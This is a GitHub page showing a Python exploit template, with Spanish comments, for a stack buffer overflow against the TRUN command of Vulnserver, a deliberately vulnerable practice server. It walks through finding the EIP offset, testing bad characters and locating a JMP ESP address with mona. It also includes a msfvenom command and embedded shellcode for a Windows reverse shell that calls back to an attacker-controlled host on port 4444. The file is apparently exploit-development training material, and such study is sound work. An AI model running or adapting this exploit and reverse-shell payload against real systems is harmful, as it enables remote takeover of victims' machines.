-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathvulnserver_exploit_template.py
287 lines (244 loc) · 9.64 KB
/
vulnserver_exploit_template.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
#!/usr/bin/python3
from pwn import *
from termcolor import colored
"""
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07"
"\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17"
"\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27"
"\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37"
"\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57"
"\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67"
"\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87"
"\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97"
"\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7"
"\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7"
"\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7"
"\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
"""
rhost = "192.168.130.131"
rport = 8080
welcome_message = "Welcome to Vulnerable Server! Enter HELP for help."
debug_msg = True
def check_connection():
try:
r = remote(rhost, rport, ssl=False)
welcome_msg = str(r.recvline())
r.close()
except:
print("Server not running. Closing fuzzer.")
exit(1)
if not welcome_message.find(welcome_msg):
print("Welcome message not understod. Closing fuzzer.")
exit(1)
def exploit():
# Comando vulnerable a BoF
command = "TRUN /.:/"
# Buffer size
buffer_size = 2111
#### Offset: Encontrar la posición que sobre-escribe EIP (offset)
"""
# Generar patrón único
cyclic_pattern = (cyclic(buffer_size).decode("utf-8"))
# Enviar patron
buffer = ""
buffer = command + cyclic_pattern
print(colored('\n>>>> Sending cyclic pattern...', 'yellow'))
print(colored('>>>> Buffer size: ', 'yellow') + str(len(buffer)) + "\n")
r = remote(rhost, rport, ssl=False)
r.send(buffer)
r.recvline()
r.close()
exit(0)
# Identificar offset (convertir valor hex de EIP)
#
# ipython> from pwn import *
# ipython> cyclic_find(0x<Valor de EIP>)
#
"""
# Offset
offset = 0
### -------------------------------------------------------------- ###
### -------------------------------------------------------------- ###
#### Offset: Verificar que se sobre-escribe correctamente EIP
#### EIP debe contener 42424242 => "BBBB"
"""
# Crear nuevo buffer
buffer = ""
buffer = command + ("A" * offset) + ("B" * 4) + ("C" * (buffer_size - 4))
# Enviar nuevo buffer
print(colored('\n>>>> Sending \"BBBB\" buffer to validate EIP writing...', 'cyan'))
print(colored('>>>> Buffer size: ', 'cyan') + str(len(buffer)) + "\n")
r = remote(rhost, rport, ssl=False)
r.send(buffer)
r.recvline()
r.close()
exit(0)
# Verificar visualmente en IMMUNITY que se escribió EIP con "BBBB"
# Immunity GUI
"""
### -------------------------------------------------------------- ###
### -------------------------------------------------------------- ###
#### BadChars: Encontrar badchars
"""
# >>>>>>>>>>
# Crear nuevo buffer
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07"
"\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17"
"\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27"
"\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37"
"\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57"
"\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67"
"\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77"
"\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87"
"\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97"
"\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7"
"\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7"
"\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7"
"\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
### buffer = command + badchars + "C" * (buffer_size - len(badchars))
buffer = ""
buffer = command + ("A" * offset) + ("B" * 4) + badchars
# Enviar badchars
print(colored('\n>>>> Sending badchars...', 'green'))
print(colored('>>>> Buffer size: ', 'green') + str(len(buffer)) + "\n")
r = remote(rhost, rport, ssl=False)
r.send(buffer)
r.recvline()
r.close()
exit(0)
# Verificar visualmente en IMMUNITY los bytes faltantes
# Immunity GUI
# Volver a repeter hasta que no falte niniguno
# <<<<<<<<<<<<<
"""
# Badchars
badchars = "\x00"
### -------------------------------------------------------------- ###
### -------------------------------------------------------------- ###
#### Find Safe module & su la dirección de la instrucción "JMP ESP"
#### El valor de la dirección de "JMP ESP" será escrita en EIP, de modo que
#### EIP salte a la dirección de "JMP ESP" y esta instrucción saltará al
#### código que haya en el registro ESP (el shellcode)
"""
# Desde ipython
# ipython> asm("jmp esp")
# Desde IMMUNITY, ejecutar mona.py
# !mona modules
# !mona find -s "\xff\xe4" -m <secure_module.dll>
# Resultado: 0x625011af (este valor se debe invertir así: "\xaf\x11\x50\x62")
# Enviar la dirección de momoria de "JMP ESP" a EIP y validar
jmp_address = "\xaf\x11\x50\x62"
buffer = ""
buffer = command + ("A" * offset) + jmp_address + "\x90" * 100
# Enviar badchars
print(colored('\n>>>> Sending badchars...', 'magenta'))
print(colored('>>>> Buffer size: ', 'magenta') + str(len(buffer)) + "\n")
r = remote(rhost, rport, ssl=False)
r.send(buffer)
r.recvline()
r.close()
exit(0)
"""
# JMP ESP address
jmp_address = "\x00\x00\x00\x00"
### -------------------------------------------------------------- ###
### -------------------------------------------------------------- ###
#### Generar shellcode "reverse shell" y explotar BoF
"""
###
###
## MFSVENOM Template
# msfvenom --arch x86 --platform windows \
# --payload windows/shell_reverse_tcp \
# LHOST=<AttackerIP> LPORT=4444 \
# EXITFUNC=thread --format c --bad-chars '\x00' --smallest
###
#### Armar exploit
###
# msfvenom --arch x86 --platform windows --payload windows/shell_reverse_tcp LHOST=192.168.130.130 LPORT=4444 EXITFUNC=thread --format c --bad-chars '\x00' --smallest
shellcode = (
"\x2b\xc9\x66\xb9\x43\x01\xe8\xff\xff\xff\xff\xc1\x5e\x30\x4c"
"\x0e\x07\xe2\xfa\xfd\xea\x81\x04\x05\x06\x67\x81\xec\x3b\xcb"
"\x68\x86\x5e\x3f\x9b\x43\x1e\x98\x46\x01\x9d\x65\x30\x16\xad"
"\x51\x3a\x2c\xe1\xb3\x1c\x40\x5e\x21\x08\x05\xe7\xe8\x25\x28"
"\xed\xc9\xde\x7f\x79\xa4\x62\x21\xb9\x79\x08\xbe\x7a\x26\x40"
"\xda\x72\x3a\xed\x6c\xb5\x66\x60\x40\x91\xc8\x0d\x5d\xa5\x7d"
"\x01\xc2\x7e\xc0\x4d\x9b\x7f\xb0\xfc\x90\x9d\x5e\x55\x92\x6e"
"\xb7\x2d\xaf\x59\x26\xa4\x66\x23\x7b\x15\x85\x3a\xe8\x3c\x41"
"\x67\xb4\x0e\xe2\x66\x20\xe7\x35\x72\x6e\xa3\xfa\x76\xf8\x75"
"\xa5\xff\x33\x5c\x5d\x21\x20\x1d\x24\x24\x2e\x7f\x61\xdd\xdc"
"\xde\x0e\x94\x6c\x05\xd4\xe2\xb8\xbe\x8d\x8e\xe7\xe7\xe2\xa0"
"\xcc\xc0\xfd\xda\xe0\xbe\x9e\x65\x4e\x24\x0d\x9f\x9f\xa0\x88"
"\x66\xf7\xf4\xcd\x8f\x27\xc3\xa9\x55\x7e\xfc\xfd\xfe\xff\xf0"
"\xe1\xf2\xe3\xdc\x5f\xb9\x68\x58\x46\x6f\x2c\xd6\xb8\xd6\x7f"
"\x68\x43\x40\xab\xc6\xc5\xd7\x9b\x41\x2f\xa0\xdb\x9a\x9a\xa6"
"\x56\x75\xa5\xb3\x2c\x01\x50\x16\xa3\xd4\x26\x94\xd3\xa9\x31"
"\xb6\x2f\x55\x43\xb4\x1c\x31\x8d\x85\x8a\x8c\xe9\x63\x08\xbb"
"\xba\xb9\xde\x06\x9b\xe0\xaa\xa2\x17\x0b\x91\x3f\xbd\xde\xc7"
"\xfd\xfc\x73\xbb\x24\x11\xc4\x03\x40\x51\x56\x51\x5e\x5f\x4c"
"\x5d\x42\x5b\x58\x5c\x46\x79\x6b\xdf\x2b\x93\xe9\xc2\x91\xf9"
"\x54\x4d\x5a\xe2\x2e\x77\x28\xa6\x3f\x43\xdb\xf0\x9d\xc7\x35"
"\x03\x20\x43\x8a\xb8\x93\xb2\xcf\xe4\x0e\x35\x48\x3f\xb6\xcc"
"\xd8\x4c\x3f\x80\x7b\x2e\x4c\x50\x2a\x41\x11\xbc\x91"
)
nops = "\x90"
buffer = ""
buffer = command + ("A" * offset) + jmp_address + nops * 20 + shellcode
# Enviar exploit
print(colored('\n>>>> Sending shellcode...', 'red', attrs=[ 'bold']), end='')
for i in range(20):
print(colored('.', 'red', attrs=[ 'bold']), end='')
sleep(0.1)
print("")
r = remote(rhost, rport, ssl=False)
r.send(buffer)
r.recvline()
r.close()
print(colored('\nDone! Happy hacking ;)', 'green', attrs=[ 'bold']))
"""
if __name__ == "__main__":
check_connection()
exploit()